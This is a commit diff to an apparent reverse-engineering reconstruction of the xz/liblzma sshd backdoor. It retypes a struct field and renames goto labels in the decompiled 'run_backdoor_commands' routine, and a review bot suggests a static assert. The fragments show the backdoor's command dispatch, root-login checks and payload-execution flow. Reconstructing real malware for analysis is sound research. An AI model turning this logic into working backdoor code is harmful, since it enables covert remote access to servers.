minor changes
smx-smx committed May 1, 2024
1 parent db38f8b commit f6d2b65
Showing 2 changed files with 6 additions and 8 deletions.
2 changes: 1 addition & 1 deletion xzre.h
@@ -1942,7 +1942,7 @@ typedef union __attribute__((packed)) payload {
*/
typedef struct __attribute__((packed)) run_backdoor_commands_data {
u64 body_size;
u32 *p_do_orig;
BOOL *p_do_orig;
u64 payload_size;
u64 hostkey_hash_offset;
RSA *rsa;
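Review bot: The pointee width of `p_do_orig` in `run_backdoor_commands_data` now rests on the `BOOL` typedef, which this hunk does not show, and nothing pins it to the 32 bits that the `u32 *` declaration spelled out (this reads `BOOL *` as the new side, matching the `BOOL *do_orig` parameter of `run_backdoor_commands`). If `BOOL` were ever narrower or wider, stores through this pointer would no longer match the width the earlier declaration documented, which matters in a header meant to mirror a binary's layout. A `_Static_assert(sizeof(BOOL) == sizeof(u32), "BOOL must stay 32-bit");` beside the typedef would make that explicit. The field also has no comment; something like `/* presumably the caller's do_orig out-flag; confirm */` would help readers of the struct. The struct definition continues past the end of the hunk.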
12 changes: 5 additions & 7 deletions xzre_code/run_backdoor_commands.c
@@ -250,12 +250,12 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){
if(cmd_type == 1){
if(!TEST_FLAG(f.kctx.args.flags2, CMDF_IMPERSONATE)
&& !ctx->sshd_ctx->permit_root_login_ptr) break;
goto j_monitor_req;
goto j_payload_main;
}
if(cmd_type != 3){
j_monitor_req:
j_payload_main:
offsets.value = 0;
goto payload_exec;
goto payload_main;
}
if((f.kctx.args.u.value[0] & 0x80) == 0
&& !ctx->sshd_ctx->permit_root_login_ptr) break;
@@ -264,7 +264,7 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){

if(!TEST_FLAG(f.kctx.args.flags3, 0x20)){
offsets.value = -1;
goto payload_exec;
goto payload_main;
}

u8 value;
@@ -315,7 +315,7 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){
have_offsets:
offsets.value = (tmp.value << 24) | v;

payload_exec:
payload_main:
ctx->sshd_offsets = offsets;

data_ptr2 = (u8 *)&f.kctx.payload + body_offset;
@@ -464,8 +464,6 @@ BOOL run_backdoor_commands(RSA *rsa, global_context_t *ctx, BOOL *do_orig){
if(!ctx->libc_imports->pselect) break;
if(!ctx->libc_imports->__errno_location) break;

int write_idx = f.u.sock.socket_fd / 64;

int res;
for(;;){
*(u64 *)&f.u.sock.fd_recv_buf[16] = __builtin_bswap32(0x50);